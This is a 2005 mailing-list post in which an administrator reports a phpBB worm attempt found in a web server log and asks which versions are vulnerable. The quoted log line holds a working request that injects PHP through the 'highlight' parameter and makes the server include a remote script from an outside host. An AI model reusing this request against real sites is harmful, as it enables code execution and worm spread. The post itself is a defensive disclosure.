New (maybe old?) PhpBB worm about?

[Robin <robin () kallisti net nz>]

I just noticed these in my logs:
63.193.240.128 - - [11/Dec/2005:01:43:25 +1300] 
"GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]).
%2527&m=http://www.yatas.com/phpbb_private.txt?&; HTTP/1.0" 403 1094 
"http://www.google.nl/"; "Mozilla/4.0 (modded by sirh0t fuck Aleks)"

this is pointing to a phpBB install that I chmod'ed away just recently (it 
was unused and attracting spam), hence the 403. A quick google for the UA 
string doesn't show up anything, however the URL that it links to seems 
to contain a PHP script that at a quick glance uses Google and Lycos to 
find more phpBB sites and spread to them. (If the yatas.com link is gone, 
and anyone wants a copy of the file, mail me offlist)

I'm also curious to know what the versions vulnerable to this exploit are.

-- 
Robin <robin () kallisti net nz> JabberID: <eythian () jabber kallisti net nz>

Hostes alienigeni me abduxerunt. Qui annus est?

PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8  7175 14D3 6485 A99C EB6D

Attachment: _bin
Description: